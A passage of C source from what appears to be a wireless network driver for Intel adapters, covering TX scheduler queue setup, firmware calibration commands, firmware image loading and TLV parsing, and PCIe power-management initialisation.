"->Doing %s\n", __func__); /* Stop TX scheduler while we're changing its configuration. */ iwn_prph_write(sc, IWN5000_SCHED_QUEUE_STATUS(qid), IWN5000_TXQ_STATUS_CHGACT); /* Disable aggregation for the queue. */ iwn_prph_clrbits(sc, IWN5000_SCHED_AGGR_SEL, 1 << qid); /* Set starting sequence number from the ADDBA request. */ IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, qid << 8 | (ssn & 0xff)); iwn_prph_write(sc, IWN5000_SCHED_QUEUE_RDPTR(qid), ssn); /* Disable interrupts for the queue. */ iwn_prph_clrbits(sc, IWN5000_SCHED_INTR_MASK, 1 << qid); /* Mark the queue as inactive. */ iwn_prph_write(sc, IWN5000_SCHED_QUEUE_STATUS(qid), IWN5000_TXQ_STATUS_INACTIVE | iwn_tid2fifo[tid]); } /* * Query calibration tables from the initialization firmware. We do this * only once at first boot. Called from a process context. */ static int iwn5000_query_calibration(struct iwn_softc *sc) { struct iwn5000_calib_config cmd; int error; memset(&cmd, 0, sizeof cmd); cmd.ucode.once.enable = htole32(0xffffffff); cmd.ucode.once.start = htole32(0xffffffff); cmd.ucode.once.send = htole32(0xffffffff); cmd.ucode.flags = htole32(0xffffffff); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: sending calibration query\n", __func__); error = iwn_cmd(sc, IWN5000_CMD_CALIB_CONFIG, &cmd, sizeof cmd, 0); if (error != 0) return error; /* Wait at most two seconds for calibration to complete. */ if (!(sc->sc_flags & IWN_FLAG_CALIB_DONE)) error = msleep(sc, &sc->sc_mtx, PCATCH, "iwncal", 2 * hz); return error; } /* * Send calibration results to the runtime firmware. These results were * obtained on first boot from the initialization firmware. */ static int iwn5000_send_calibration(struct iwn_softc *sc) { int idx, error; for (idx = 0; idx < IWN5000_PHY_CALIB_MAX_RESULT; idx++) { if (!(sc->base_params->calib_need & (1<calibcmd[idx].buf == NULL) { DPRINTF(sc, IWN_DEBUG_CALIBRATE, "Need calib idx : %d but no available data\n", idx); continue; } DPRINTF(sc, IWN_DEBUG_CALIBRATE, "send calibration result idx=%d len=%d\n", idx, sc->calibcmd[idx].len); error = iwn_cmd(sc, IWN_CMD_PHY_CALIB, sc->calibcmd[idx].buf, sc->calibcmd[idx].len, 0); if (error != 0) { device_printf(sc->sc_dev, "%s: could not send calibration result, error %d\n", __func__, error); return error; } } return 0; } static int iwn5000_send_wimax_coex(struct iwn_softc *sc) { struct iwn5000_wimax_coex wimax; #if 0 if (sc->hw_type == IWN_HW_REV_TYPE_6050) { /* Enable WiMAX coexistence for combo adapters. */ wimax.flags = IWN_WIMAX_COEX_ASSOC_WA_UNMASK | IWN_WIMAX_COEX_UNASSOC_WA_UNMASK | IWN_WIMAX_COEX_STA_TABLE_VALID | IWN_WIMAX_COEX_ENABLE; memcpy(wimax.events, iwn6050_wimax_events, sizeof iwn6050_wimax_events); } else #endif { /* Disable WiMAX coexistence. */ wimax.flags = 0; memset(wimax.events, 0, sizeof wimax.events); } DPRINTF(sc, IWN_DEBUG_RESET, "%s: Configuring WiMAX coexistence\n", __func__); return iwn_cmd(sc, IWN5000_CMD_WIMAX_COEX, &wimax, sizeof wimax, 0); } static int iwn5000_crystal_calib(struct iwn_softc *sc) { struct iwn5000_phy_calib_crystal cmd; memset(&cmd, 0, sizeof cmd); cmd.code = IWN5000_PHY_CALIB_CRYSTAL; cmd.ngroups = 1; cmd.isvalid = 1; cmd.cap_pin[0] = le32toh(sc->eeprom_crystal) & 0xff; cmd.cap_pin[1] = (le32toh(sc->eeprom_crystal) >> 16) & 0xff; DPRINTF(sc, IWN_DEBUG_CALIBRATE, "sending crystal calibration %d, %d\n", cmd.cap_pin[0], cmd.cap_pin[1]); return iwn_cmd(sc, IWN_CMD_PHY_CALIB, &cmd, sizeof cmd, 0); } static int iwn5000_temp_offset_calib(struct iwn_softc *sc) { struct iwn5000_phy_calib_temp_offset cmd; memset(&cmd, 0, sizeof cmd); cmd.code = IWN5000_PHY_CALIB_TEMP_OFFSET; cmd.ngroups = 1; cmd.isvalid = 1; if (sc->eeprom_temp != 0) cmd.offset = htole16(sc->eeprom_temp); else cmd.offset = htole16(IWN_DEFAULT_TEMP_OFFSET); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "setting radio sensor offset to %d\n", le16toh(cmd.offset)); return iwn_cmd(sc, IWN_CMD_PHY_CALIB, &cmd, sizeof cmd, 0); } static int iwn5000_temp_offset_calibv2(struct iwn_softc *sc) { struct iwn5000_phy_calib_temp_offsetv2 cmd; memset(&cmd, 0, sizeof cmd); cmd.code = IWN5000_PHY_CALIB_TEMP_OFFSET; cmd.ngroups = 1; cmd.isvalid = 1; if (sc->eeprom_temp != 0) { cmd.offset_low = htole16(sc->eeprom_temp); cmd.offset_high = htole16(sc->eeprom_temp_high); } else { cmd.offset_low = htole16(IWN_DEFAULT_TEMP_OFFSET); cmd.offset_high = htole16(IWN_DEFAULT_TEMP_OFFSET); } cmd.burnt_voltage_ref = htole16(sc->eeprom_voltage); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "setting radio sensor low offset to %d, high offset to %d, voltage to %d\n", le16toh(cmd.offset_low), le16toh(cmd.offset_high), le16toh(cmd.burnt_voltage_ref)); return iwn_cmd(sc, IWN_CMD_PHY_CALIB, &cmd, sizeof cmd, 0); } /* * This function is called after the runtime firmware notifies us of its * readiness (called in a process context). */ static int iwn4965_post_alive(struct iwn_softc *sc) { int error, qid; if ((error = iwn_nic_lock(sc)) != 0) return error; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Clear TX scheduler state in SRAM. */ sc->sched_base = iwn_prph_read(sc, IWN_SCHED_SRAM_ADDR); iwn_mem_set_region_4(sc, sc->sched_base + IWN4965_SCHED_CTX_OFF, 0, IWN4965_SCHED_CTX_LEN / sizeof (uint32_t)); /* Set physical address of TX scheduler rings (1KB aligned). */ iwn_prph_write(sc, IWN4965_SCHED_DRAM_ADDR, sc->sched_dma.paddr >> 10); IWN_SETBITS(sc, IWN_FH_TX_CHICKEN, IWN_FH_TX_CHICKEN_SCHED_RETRY); /* Disable chain mode for all our 16 queues. */ iwn_prph_write(sc, IWN4965_SCHED_QCHAIN_SEL, 0); for (qid = 0; qid < IWN4965_NTXQUEUES; qid++) { iwn_prph_write(sc, IWN4965_SCHED_QUEUE_RDPTR(qid), 0); IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, qid << 8 | 0); /* Set scheduler window size. */ iwn_mem_write(sc, sc->sched_base + IWN4965_SCHED_QUEUE_OFFSET(qid), IWN_SCHED_WINSZ); /* Set scheduler frame limit. */ iwn_mem_write(sc, sc->sched_base + IWN4965_SCHED_QUEUE_OFFSET(qid) + 4, IWN_SCHED_LIMIT << 16); } /* Enable interrupts for all our 16 queues. */ iwn_prph_write(sc, IWN4965_SCHED_INTR_MASK, 0xffff); /* Identify TX FIFO rings (0-7). */ iwn_prph_write(sc, IWN4965_SCHED_TXFACT, 0xff); /* Mark TX rings (4 EDCA + cmd + 2 HCCA) as active. */ for (qid = 0; qid < 7; qid++) { static uint8_t qid2fifo[] = { 3, 2, 1, 0, 4, 5, 6 }; iwn_prph_write(sc, IWN4965_SCHED_QUEUE_STATUS(qid), IWN4965_TXQ_STATUS_ACTIVE | qid2fifo[qid] << 1); } iwn_nic_unlock(sc); return 0; } /* * This function is called after the initialization or runtime firmware * notifies us of its readiness (called in a process context). */ static int iwn5000_post_alive(struct iwn_softc *sc) { int error, qid; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Switch to using ICT interrupt mode. */ iwn5000_ict_reset(sc); if ((error = iwn_nic_lock(sc)) != 0){ DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end in error\n", __func__); return error; } /* Clear TX scheduler state in SRAM. */ sc->sched_base = iwn_prph_read(sc, IWN_SCHED_SRAM_ADDR); iwn_mem_set_region_4(sc, sc->sched_base + IWN5000_SCHED_CTX_OFF, 0, IWN5000_SCHED_CTX_LEN / sizeof (uint32_t)); /* Set physical address of TX scheduler rings (1KB aligned). */ iwn_prph_write(sc, IWN5000_SCHED_DRAM_ADDR, sc->sched_dma.paddr >> 10); IWN_SETBITS(sc, IWN_FH_TX_CHICKEN, IWN_FH_TX_CHICKEN_SCHED_RETRY); /* Enable chain mode for all queues, except command queue. */ if (sc->sc_flags & IWN_FLAG_PAN_SUPPORT) iwn_prph_write(sc, IWN5000_SCHED_QCHAIN_SEL, 0xfffdf); else iwn_prph_write(sc, IWN5000_SCHED_QCHAIN_SEL, 0xfffef); iwn_prph_write(sc, IWN5000_SCHED_AGGR_SEL, 0); for (qid = 0; qid < IWN5000_NTXQUEUES; qid++) { iwn_prph_write(sc, IWN5000_SCHED_QUEUE_RDPTR(qid), 0); IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, qid << 8 | 0); iwn_mem_write(sc, sc->sched_base + IWN5000_SCHED_QUEUE_OFFSET(qid), 0); /* Set scheduler window size and frame limit. */ iwn_mem_write(sc, sc->sched_base + IWN5000_SCHED_QUEUE_OFFSET(qid) + 4, IWN_SCHED_LIMIT << 16 | IWN_SCHED_WINSZ); } /* Enable interrupts for all our 20 queues. */ iwn_prph_write(sc, IWN5000_SCHED_INTR_MASK, 0xfffff); /* Identify TX FIFO rings (0-7). */ iwn_prph_write(sc, IWN5000_SCHED_TXFACT, 0xff); /* Mark TX rings (4 EDCA + cmd + 2 HCCA) as active. */ if (sc->sc_flags & IWN_FLAG_PAN_SUPPORT) { /* Mark TX rings as active. */ for (qid = 0; qid < 11; qid++) { static uint8_t qid2fifo[] = { 3, 2, 1, 0, 0, 4, 2, 5, 4, 7, 5 }; iwn_prph_write(sc, IWN5000_SCHED_QUEUE_STATUS(qid), IWN5000_TXQ_STATUS_ACTIVE | qid2fifo[qid]); } } else { /* Mark TX rings (4 EDCA + cmd + 2 HCCA) as active. */ for (qid = 0; qid < 7; qid++) { static uint8_t qid2fifo[] = { 3, 2, 1, 0, 7, 5, 6 }; iwn_prph_write(sc, IWN5000_SCHED_QUEUE_STATUS(qid), IWN5000_TXQ_STATUS_ACTIVE | qid2fifo[qid]); } } iwn_nic_unlock(sc); /* Configure WiMAX coexistence for combo adapters. */ error = iwn5000_send_wimax_coex(sc); if (error != 0) { device_printf(sc->sc_dev, "%s: could not configure WiMAX coexistence, error %d\n", __func__, error); return error; } if (sc->hw_type != IWN_HW_REV_TYPE_5150) { /* Perform crystal calibration. */ error = iwn5000_crystal_calib(sc); if (error != 0) { device_printf(sc->sc_dev, "%s: crystal calibration failed, error %d\n", __func__, error); return error; } } if (!(sc->sc_flags & IWN_FLAG_CALIB_DONE)) { /* Query calibration from the initialization firmware. */ if ((error = iwn5000_query_calibration(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not query calibration, error %d\n", __func__, error); return error; } /* * We have the calibration results now, reboot with the * runtime firmware (call ourselves recursively!) */ iwn_hw_stop(sc); error = iwn_hw_init(sc); } else { /* Send calibration results to runtime firmware. */ error = iwn5000_send_calibration(sc); } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return error; } /* * The firmware boot code is small and is intended to be copied directly into * the NIC internal memory (no DMA transfer). */ static int iwn4965_load_bootcode(struct iwn_softc *sc, const uint8_t *ucode, int size) { int error, ntries; size /= sizeof (uint32_t); if ((error = iwn_nic_lock(sc)) != 0) return error; /* Copy microcode image into NIC memory. */ iwn_prph_write_region_4(sc, IWN_BSM_SRAM_BASE, (const uint32_t *)ucode, size); iwn_prph_write(sc, IWN_BSM_WR_MEM_SRC, 0); iwn_prph_write(sc, IWN_BSM_WR_MEM_DST, IWN_FW_TEXT_BASE); iwn_prph_write(sc, IWN_BSM_WR_DWCOUNT, size); /* Start boot load now. */ iwn_prph_write(sc, IWN_BSM_WR_CTRL, IWN_BSM_WR_CTRL_START); /* Wait for transfer to complete. */ for (ntries = 0; ntries < 1000; ntries++) { if (!(iwn_prph_read(sc, IWN_BSM_WR_CTRL) & IWN_BSM_WR_CTRL_START)) break; DELAY(10); } if (ntries == 1000) { device_printf(sc->sc_dev, "%s: could not load boot firmware\n", __func__); iwn_nic_unlock(sc); return ETIMEDOUT; } /* Enable boot after power up. */ iwn_prph_write(sc, IWN_BSM_WR_CTRL, IWN_BSM_WR_CTRL_START_EN); iwn_nic_unlock(sc); return 0; } static int iwn4965_load_firmware(struct iwn_softc *sc) { struct iwn_fw_info *fw = &sc->fw; struct iwn_dma_info *dma = &sc->fw_dma; int error; /* Copy initialization sections into pre-allocated DMA-safe memory. */ memcpy(dma->vaddr, fw->init.data, fw->init.datasz); bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_PREWRITE); memcpy(dma->vaddr + IWN4965_FW_DATA_MAXSZ, fw->init.text, fw->init.textsz); bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_PREWRITE); /* Tell adapter where to find initialization sections. */ if ((error = iwn_nic_lock(sc)) != 0) return error; iwn_prph_write(sc, IWN_BSM_DRAM_DATA_ADDR, dma->paddr >> 4); iwn_prph_write(sc, IWN_BSM_DRAM_DATA_SIZE, fw->init.datasz); iwn_prph_write(sc, IWN_BSM_DRAM_TEXT_ADDR, (dma->paddr + IWN4965_FW_DATA_MAXSZ) >> 4); iwn_prph_write(sc, IWN_BSM_DRAM_TEXT_SIZE, fw->init.textsz); iwn_nic_unlock(sc); /* Load firmware boot code. */ error = iwn4965_load_bootcode(sc, fw->boot.text, fw->boot.textsz); if (error != 0) { device_printf(sc->sc_dev, "%s: could not load boot firmware\n", __func__); return error; } /* Now press "execute". */ IWN_WRITE(sc, IWN_RESET, 0); /* Wait at most one second for first alive notification. */ if ((error = msleep(sc, &sc->sc_mtx, PCATCH, "iwninit", hz)) != 0) { device_printf(sc->sc_dev, "%s: timeout waiting for adapter to initialize, error %d\n", __func__, error); return error; } /* Retrieve current temperature for initial TX power calibration. */ sc->rawtemp = sc->ucode_info.temp[3].chan20MHz; sc->temp = iwn4965_get_temperature(sc); /* Copy runtime sections into pre-allocated DMA-safe memory. */ memcpy(dma->vaddr, fw->main.data, fw->main.datasz); bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_PREWRITE); memcpy(dma->vaddr + IWN4965_FW_DATA_MAXSZ, fw->main.text, fw->main.textsz); bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_PREWRITE); /* Tell adapter where to find runtime sections. */ if ((error = iwn_nic_lock(sc)) != 0) return error; iwn_prph_write(sc, IWN_BSM_DRAM_DATA_ADDR, dma->paddr >> 4); iwn_prph_write(sc, IWN_BSM_DRAM_DATA_SIZE, fw->main.datasz); iwn_prph_write(sc, IWN_BSM_DRAM_TEXT_ADDR, (dma->paddr + IWN4965_FW_DATA_MAXSZ) >> 4); iwn_prph_write(sc, IWN_BSM_DRAM_TEXT_SIZE, IWN_FW_UPDATED | fw->main.textsz); iwn_nic_unlock(sc); return 0; } static int iwn5000_load_firmware_section(struct iwn_softc *sc, uint32_t dst, const uint8_t *section, int size) { struct iwn_dma_info *dma = &sc->fw_dma; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Copy firmware section into pre-allocated DMA-safe memory. */ memcpy(dma->vaddr, section, size); bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_PREWRITE); if ((error = iwn_nic_lock(sc)) != 0) return error; IWN_WRITE(sc, IWN_FH_TX_CONFIG(IWN_SRVC_DMACHNL), IWN_FH_TX_CONFIG_DMA_PAUSE); IWN_WRITE(sc, IWN_FH_SRAM_ADDR(IWN_SRVC_DMACHNL), dst); IWN_WRITE(sc, IWN_FH_TFBD_CTRL0(IWN_SRVC_DMACHNL), IWN_LOADDR(dma->paddr)); IWN_WRITE(sc, IWN_FH_TFBD_CTRL1(IWN_SRVC_DMACHNL), IWN_HIADDR(dma->paddr) << 28 | size); IWN_WRITE(sc, IWN_FH_TXBUF_STATUS(IWN_SRVC_DMACHNL), IWN_FH_TXBUF_STATUS_TBNUM(1) | IWN_FH_TXBUF_STATUS_TBIDX(1) | IWN_FH_TXBUF_STATUS_TFBD_VALID); /* Kick Flow Handler to start DMA transfer. */ IWN_WRITE(sc, IWN_FH_TX_CONFIG(IWN_SRVC_DMACHNL), IWN_FH_TX_CONFIG_DMA_ENA | IWN_FH_TX_CONFIG_CIRQ_HOST_ENDTFD); iwn_nic_unlock(sc); /* Wait at most five seconds for FH DMA transfer to complete. */ return msleep(sc, &sc->sc_mtx, PCATCH, "iwninit", 5 * hz); } static int iwn5000_load_firmware(struct iwn_softc *sc) { struct iwn_fw_part *fw; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Load the initialization firmware on first boot only. */ fw = (sc->sc_flags & IWN_FLAG_CALIB_DONE) ? &sc->fw.main : &sc->fw.init; error = iwn5000_load_firmware_section(sc, IWN_FW_TEXT_BASE, fw->text, fw->textsz); if (error != 0) { device_printf(sc->sc_dev, "%s: could not load firmware %s section, error %d\n", __func__, ".text", error); return error; } error = iwn5000_load_firmware_section(sc, IWN_FW_DATA_BASE, fw->data, fw->datasz); if (error != 0) { device_printf(sc->sc_dev, "%s: could not load firmware %s section, error %d\n", __func__, ".data", error); return error; } /* Now press "execute". */ IWN_WRITE(sc, IWN_RESET, 0); return 0; } /* * Extract text and data sections from a legacy firmware image. */ static int iwn_read_firmware_leg(struct iwn_softc *sc, struct iwn_fw_info *fw) { const uint32_t *ptr; size_t hdrlen = 24; uint32_t rev; ptr = (const uint32_t *)fw->data; rev = le32toh(*ptr++); /* Check firmware API version. */ if (IWN_FW_API(rev) <= 1) { device_printf(sc->sc_dev, "%s: bad firmware, need API version >=2\n", __func__); return EINVAL; } if (IWN_FW_API(rev) >= 3) { /* Skip build number (version 2 header). */ hdrlen += 4; ptr++; } if (fw->size < hdrlen) { device_printf(sc->sc_dev, "%s: firmware too short: %zu bytes\n", __func__, fw->size); return EINVAL; } fw->main.textsz = le32toh(*ptr++); fw->main.datasz = le32toh(*ptr++); fw->init.textsz = le32toh(*ptr++); fw->init.datasz = le32toh(*ptr++); fw->boot.textsz = le32toh(*ptr++); /* Check that all firmware sections fit. */ if (fw->size < hdrlen + fw->main.textsz + fw->main.datasz + fw->init.textsz + fw->init.datasz + fw->boot.textsz) { device_printf(sc->sc_dev, "%s: firmware too short: %zu bytes\n", __func__, fw->size); return EINVAL; } /* Get pointers to firmware sections. */ fw->main.text = (const uint8_t *)ptr; fw->main.data = fw->main.text + fw->main.textsz; fw->init.text = fw->main.data + fw->main.datasz; fw->init.data = fw->init.text + fw->init.textsz; fw->boot.text = fw->init.data + fw->init.datasz; return 0; } /* * Extract text and data sections from a TLV firmware image. */ static int iwn_read_firmware_tlv(struct iwn_softc *sc, struct iwn_fw_info *fw, uint16_t alt) { const struct iwn_fw_tlv_hdr *hdr; const struct iwn_fw_tlv *tlv; const uint8_t *ptr, *end; uint64_t altmask; uint32_t len, tmp; if (fw->size < sizeof (*hdr)) { device_printf(sc->sc_dev, "%s: firmware too short: %zu bytes\n", __func__, fw->size); return EINVAL; } hdr = (const struct iwn_fw_tlv_hdr *)fw->data; if (hdr->signature != htole32(IWN_FW_SIGNATURE)) { device_printf(sc->sc_dev, "%s: bad firmware signature 0x%08x\n", __func__, le32toh(hdr->signature)); return EINVAL; } DPRINTF(sc, IWN_DEBUG_RESET, "FW: \"%.64s\", build 0x%x\n", hdr->descr, le32toh(hdr->build)); /* * Select the closest supported alternative that is less than * or equal to the specified one. */ altmask = le64toh(hdr->altmask); while (alt > 0 && !(altmask & (1ULL << alt))) alt--; /* Downgrade. */ DPRINTF(sc, IWN_DEBUG_RESET, "using alternative %d\n", alt); ptr = (const uint8_t *)(hdr + 1); end = (const uint8_t *)(fw->data + fw->size); /* Parse type-length-value fields. */ while (ptr + sizeof (*tlv) <= end) { tlv = (const struct iwn_fw_tlv *)ptr; len = le32toh(tlv->len); ptr += sizeof (*tlv); if (ptr + len > end) { device_printf(sc->sc_dev, "%s: firmware too short: %zu bytes\n", __func__, fw->size); return EINVAL; } /* Skip other alternatives. */ if (tlv->alt != 0 && tlv->alt != htole16(alt)) goto next; switch (le16toh(tlv->type)) { case IWN_FW_TLV_MAIN_TEXT: fw->main.text = ptr; fw->main.textsz = len; break; case IWN_FW_TLV_MAIN_DATA: fw->main.data = ptr; fw->main.datasz = len; break; case IWN_FW_TLV_INIT_TEXT: fw->init.text = ptr; fw->init.textsz = len; break; case IWN_FW_TLV_INIT_DATA: fw->init.data = ptr; fw->init.datasz = len; break; case IWN_FW_TLV_BOOT_TEXT: fw->boot.text = ptr; fw->boot.textsz = len; break; case IWN_FW_TLV_ENH_SENS: if (!len) sc->sc_flags |= IWN_FLAG_ENH_SENS; break; case IWN_FW_TLV_PHY_CALIB: tmp = le32toh(*ptr); if (tmp < 253) { sc->reset_noise_gain = tmp; sc->noise_gain = tmp + 1; } break; case IWN_FW_TLV_PAN: sc->sc_flags |= IWN_FLAG_PAN_SUPPORT; DPRINTF(sc, IWN_DEBUG_RESET, "PAN Support found: %d\n", 1); break; case IWN_FW_TLV_FLAGS: if (len < sizeof(uint32_t)) break; if (len % sizeof(uint32_t)) break; sc->tlv_feature_flags = le32toh(*ptr); DPRINTF(sc, IWN_DEBUG_RESET, "%s: feature: 0x%08x\n", __func__, sc->tlv_feature_flags); break; case IWN_FW_TLV_PBREQ_MAXLEN: case IWN_FW_TLV_RUNT_EVTLOG_PTR: case IWN_FW_TLV_RUNT_EVTLOG_SIZE: case IWN_FW_TLV_RUNT_ERRLOG_PTR: case IWN_FW_TLV_INIT_EVTLOG_PTR: case IWN_FW_TLV_INIT_EVTLOG_SIZE: case IWN_FW_TLV_INIT_ERRLOG_PTR: case IWN_FW_TLV_WOWLAN_INST: case IWN_FW_TLV_WOWLAN_DATA: DPRINTF(sc, IWN_DEBUG_RESET, "TLV type %d reconized but not handled\n", le16toh(tlv->type)); break; default: DPRINTF(sc, IWN_DEBUG_RESET, "TLV type %d not handled\n", le16toh(tlv->type)); break; } next: /* TLV fields are 32-bit aligned. */ ptr += (len + 3) & ~3; } return 0; } static int iwn_read_firmware(struct iwn_softc *sc) { struct iwn_fw_info *fw = &sc->fw; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); IWN_UNLOCK(sc); memset(fw, 0, sizeof (*fw)); /* Read firmware image from filesystem. */ sc->fw_fp = firmware_get(sc->fwname); if (sc->fw_fp == NULL) { device_printf(sc->sc_dev, "%s: could not read firmware %s\n", __func__, sc->fwname); IWN_LOCK(sc); return EINVAL; } IWN_LOCK(sc); fw->size = sc->fw_fp->datasize; fw->data = (const uint8_t *)sc->fw_fp->data; if (fw->size < sizeof (uint32_t)) { device_printf(sc->sc_dev, "%s: firmware too short: %zu bytes\n", __func__, fw->size); firmware_put(sc->fw_fp, FIRMWARE_UNLOAD); sc->fw_fp = NULL; return EINVAL; } /* Retrieve text and data sections. */ if (*(const uint32_t *)fw->data != 0) /* Legacy image. */ error = iwn_read_firmware_leg(sc, fw); else error = iwn_read_firmware_tlv(sc, fw, 1); if (error != 0) { device_printf(sc->sc_dev, "%s: could not read firmware sections, error %d\n", __func__, error); firmware_put(sc->fw_fp, FIRMWARE_UNLOAD); sc->fw_fp = NULL; return error; } /* Make sure text and data sections fit in hardware memory. */ if (fw->main.textsz > sc->fw_text_maxsz || fw->main.datasz > sc->fw_data_maxsz || fw->init.textsz > sc->fw_text_maxsz || fw->init.datasz > sc->fw_data_maxsz || fw->boot.textsz > IWN_FW_BOOT_TEXT_MAXSZ || (fw->boot.textsz & 3) != 0) { device_printf(sc->sc_dev, "%s: firmware sections too large\n", __func__); firmware_put(sc->fw_fp, FIRMWARE_UNLOAD); sc->fw_fp = NULL; return EINVAL; } /* We can proceed with loading the firmware. */ return 0; } static int iwn_clock_wait(struct iwn_softc *sc) { int ntries; /* Set "initialization complete" bit. */ IWN_SETBITS(sc, IWN_GP_CNTRL, IWN_GP_CNTRL_INIT_DONE); /* Wait for clock stabilization. */ for (ntries = 0; ntries < 2500; ntries++) { if (IWN_READ(sc, IWN_GP_CNTRL) & IWN_GP_CNTRL_MAC_CLOCK_READY) return 0; DELAY(10); } device_printf(sc->sc_dev, "%s: timeout waiting for clock stabilization\n", __func__); return ETIMEDOUT; } static int iwn_apm_init(struct iwn_softc *sc) { uint32_t reg; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Disable L0s exit timer (NMI bug workaround). */ IWN_SETBITS(sc, IWN_GIO_CHICKEN, IWN_GIO_CHICKEN_DIS_L0S_TIMER); /* Don't wait for ICH L0s (ICH bug workaround). */ IWN_SETBITS(sc, IWN_GIO_CHICKEN, IWN_GIO_CHICKEN_L1A_NO_L0S_RX); /* Set FH wait threshold to max (HW bug under stress workaround). */ IWN_SETBITS(sc, IWN_DBG_HPET_MEM, 0xffff0000); /* Enable HAP INTA to move adapter from L1a to L0s. */ IWN_SETBITS(sc, IWN_HW_IF_CONFIG, IWN_HW_IF_CONFIG_HAP_WAKE_L1A); /* Retrieve PCIe Active State Power Management (ASPM). */ reg = pci_read_config(sc->sc_dev, sc->sc_cap_off + 0x10, 1); /* Workaround for HW instability in PCIe L0->L0s->L1 transition. */ if (reg & 0x02) /* L1 Entry enabled. */ IWN_SETBITS(sc, IWN_GIO, IWN_GIO_L0S_ENA); else IWN_CLRBITS(sc, IWN_GIO, IWN_GIO_L0S_ENA); if (sc->base_params->pll_cfg_val) IWN_SETBITS(sc, IWN_ANA_PLL, sc->base_params->pll_cfg_val); /* Wait for clock stabilization before accessing prph. */ if ((error = iwn_clock_wait(sc)) != 0) return error; if ((error = iwn_nic_lock(sc)) != 0) return error; if (sc->hw_type == IWN_HW_REV_TYPE_4965) { /* Enable DMA and BSM (Bootstrap State Machine). */ iwn_prph_write(sc, IWN_APMG_CLK_EN, IWN_APMG_CLK_CTRL_DMA_CLK_RQT | IWN_APMG_CLK_CTRL_BSM_CLK_RQT); } else { /* Enable DMA. */ iwn_prph_write(sc, IWN_APMG_CLK_EN, IWN_APMG_CLK_CTRL_DMA_CLK_RQT); } DELAY(20); /* Disable L1-Active. */ iwn_prph_setbits(sc, IWN_APMG_PCI_STT, IWN_APMG_PCI_STT_L1A_DIS); iwn_nic_unlock(sc); return 0; } static void iwn_apm_stop_master(struct iwn_softc *sc) { int ntries; /* Stop busmaster DMA activity. */ IWN_SETBITS(sc, IWN_RESET, IWN_RESET_STOP_MASTER); for (ntries = 0; ntries < 100; ntries++) { if (IWN_READ(sc, IWN_RESET) & IWN_RESET_MASTER_DISABLED) return; DELAY(10); } device_printf(sc->sc_dev, "%s: timeout waiting for master\n", __func__); } static void iwn_apm_stop(struct iwn_softc *sc) { iwn_apm_stop_master(sc); /* Reset the entire device. */ IWN_SETBITS(sc, IWN_RESET, IWN_RESET_SW); DELAY(10); /* Clear "initialization complete" bit. */ IWN_CLRBITS(sc, IWN_GP_CNTRL, IWN_GP_CNTRL_INIT_DONE); } static int iwn4965_nic_config(struct iwn_softc *sc) { DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); if (IWN_RFCFG_TYPE(sc->rfcfg) == 1) { /* * I don't believe this to be correct but this is what the * vendor driver is doing. Probably the bits should not be * shifted in IWN_RFCFG_*. */ IWN_SETBITS(sc, IWN_HW_IF_CONFIG, IWN_RFCFG_TYPE(sc->rfcfg) | IWN_RFCFG_STEP(sc->rfcfg) | IWN_RFCFG_DASH(sc->rfcfg)); } IWN_SETBITS(sc, IWN_HW_IF_CONFIG, IWN_HW_IF_CONFIG_RADIO_SI | IWN_HW_IF_CONFIG_MAC_SI); return 0; } static int iwn5000_nic_config(struct iwn_softc *sc) { uint32_t tmp; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); if (IWN_RFCFG_TYPE(sc->rfcfg) < 3) { IWN_SETBITS(sc, IWN_HW_IF_CONFIG, IWN_RFCFG_TYPE(sc->rfcfg) | IWN_RFCFG_STEP(sc->rfcfg) | IWN_RFCFG_DASH(sc->rfcfg)); } IWN_SETBITS(sc, IWN_HW_IF_CONFIG, IWN_HW_IF_CONFIG_RADIO_SI | IWN_HW_IF_CONFIG_MAC_SI); if ((error = iwn_nic_lock(sc)) != 0) return error; iwn_prph_setbits(sc, IWN_APMG_PS, IWN_APMG_PS_EARLY_PWROFF_DIS); if (sc->hw_type == IWN_HW_REV_TYPE_1000) { /* * Select first Switching Voltage Regulator (1.32V) to * solve a stability issue related to noisy DC2DC line * in the silicon of 1000 Series. */ tmp = iwn_prph_read(sc, IWN_APMG_DIGITAL_SVR); tmp &= ~IWN_APMG_DIGITAL_SVR_VOLTAGE_MASK; tmp |= IWN_APMG_DIGITAL_SVR_VOLTAGE_1_32; iwn_prph_write(sc, IWN_APMG_DIGITAL_SVR, tmp); } iwn_nic_unlock(sc); if (sc->sc_flags & IWN_FLAG_INTERNAL_PA) { /* Use internal power amplifier only. */ IWN_WRITE(sc, IWN_GP_DRIVER, IWN_GP_DRIVER_RADIO_2X2_IPA); } if (sc->base_params->additional_nic_config && sc->calib_ver >= 6) { /* Indicate that ROM calibration version is >=6. */ IWN_SETBITS(sc, IWN_GP_DRIVER, IWN_GP_DRIVER_CALIB_VER6); } if (sc->base_params->additional_gp_drv_bit) IWN_SETBITS(sc, IWN_GP_DRIVER, sc->base_params->additional_gp_drv_bit); return 0; } /* * Take NIC ownership over Intel Active Management Technology (AMT). */ static int iwn_hw_prepare(struct iwn_softc *sc) { int ntries; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Check if hardware is ready. */ IWN_SETBITS(sc, IWN_HW_IF_CONFIG, 